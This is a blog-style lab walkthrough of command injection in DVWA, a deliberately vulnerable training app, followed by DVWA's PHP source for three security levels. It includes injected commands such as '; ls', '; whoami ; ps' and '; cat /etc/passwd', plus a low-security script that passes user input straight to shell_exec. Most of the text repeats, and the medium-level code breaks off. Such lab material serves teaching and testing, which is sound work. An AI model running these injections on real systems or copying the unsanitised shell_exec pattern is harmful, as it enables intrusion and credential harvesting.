1.) Open Browser And go to the DVWA web browser page (http://localhost/dvwa/Login.php)
2.) Input Username : admin and Password : password Next Login
3.) Go to the DVWA Security page and change the Script Security setting
from high to low.
4.) Go to the Command Execution page in DVWA and try it out to see what it does.
Based on the response we get, we can figure out that when we enter an IP address and press submit, the server executes the command ping -c 3 192.168.1.1 and tells us the result. Now lets experiment and see what else we can get out of the server.
5.) Next we try the command 192.168.1.1 ; ls and see what happens.
Great! First we get back the same ping results, but we also get the results from the ls command which tells us that there are two folders, help and source, and one file, index.php, in the directory where the commands are being executed.
6.) Lets find out where these commands are running at, and where the filed we found previously are located by issuing the command ; pwd and reviewing the results.
Now we can see that the commands are being executed in the /srv/dvwa-nologin/vulnerabilities/exec directory, and this is also where our files are located.
7.) Lets find out who we are executing the commands as and what processes are running on the machine by executing ; whoami ; ps and viewing the results.
Now we can see that we are executing commands as the www-data user and all of the processes running on the machine.
8.) Lets see if we can find out who is allowed to login to this machine with the ; cat /etc/passwd command (this could later be used to bruteforce passwords and gain superuser access).
The /etc/passwd file is a text-based database of information about users that may login to the system or other operating system user identities that own running processes.
If you go to the links listed under More info you can try out some more commands. This is just a sample of the many things that could be done.
Now lets check the source code of the vulnerable file:
High Command Execution Source
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST["ip"];
$target = stripslashes( $target );
// Split the IP into 4 octects
$octet = explode(".", $target);
// Check IF each octet is an integer
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {
// If all 4 octets are int's put the IP back together.
$target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
else {
echo '<pre>ERROR: You have entered an invalid IP</pre>';
}
}
?>
Medium Command Execution Source
<?php
if( isset( $_POST[ 'submit'] ) ) {
$target = $_REQUEST[ 'ip' ];
// Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
Low Command Execution Source
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
2.) Input Username : admin and Password : password Next Login
3.) Go to the DVWA Security page and change the Script Security setting
from high to low.
4.) Go to the Command Execution page in DVWA and try it out to see what it does.
Based on the response we get, we can figure out that when we enter an IP address and press submit, the server executes the command ping -c 3 192.168.1.1 and tells us the result. Now lets experiment and see what else we can get out of the server.
5.) Next we try the command 192.168.1.1 ; ls and see what happens.
Great! First we get back the same ping results, but we also get the results from the ls command which tells us that there are two folders, help and source, and one file, index.php, in the directory where the commands are being executed.
6.) Lets find out where these commands are running at, and where the filed we found previously are located by issuing the command ; pwd and reviewing the results.
Now we can see that the commands are being executed in the /srv/dvwa-nologin/vulnerabilities/exec directory, and this is also where our files are located.
7.) Lets find out who we are executing the commands as and what processes are running on the machine by executing ; whoami ; ps and viewing the results.
Now we can see that we are executing commands as the www-data user and all of the processes running on the machine.
8.) Lets see if we can find out who is allowed to login to this machine with the ; cat /etc/passwd command (this could later be used to bruteforce passwords and gain superuser access).
The /etc/passwd file is a text-based database of information about users that may login to the system or other operating system user identities that own running processes.
If you go to the links listed under More info you can try out some more commands. This is just a sample of the many things that could be done.
Now lets check the source code of the vulnerable file:
High Command Execution Source
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST["ip"];
$target = stripslashes( $target );
// Split the IP into 4 octects
$octet = explode(".", $target);
// Check IF each octet is an integer
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {
// If all 4 octets are int's put the IP back together.
$target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
else {
echo '<pre>ERROR: You have entered an invalid IP</pre>';
}
}
?>
Medium Command Execution Source
<?php
if( isset( $_POST[ 'submit'] ) ) {
$target = $_REQUEST[ 'ip' ];
// Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
Low Command Execution Source
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
Tidak ada komentar:
Posting Komentar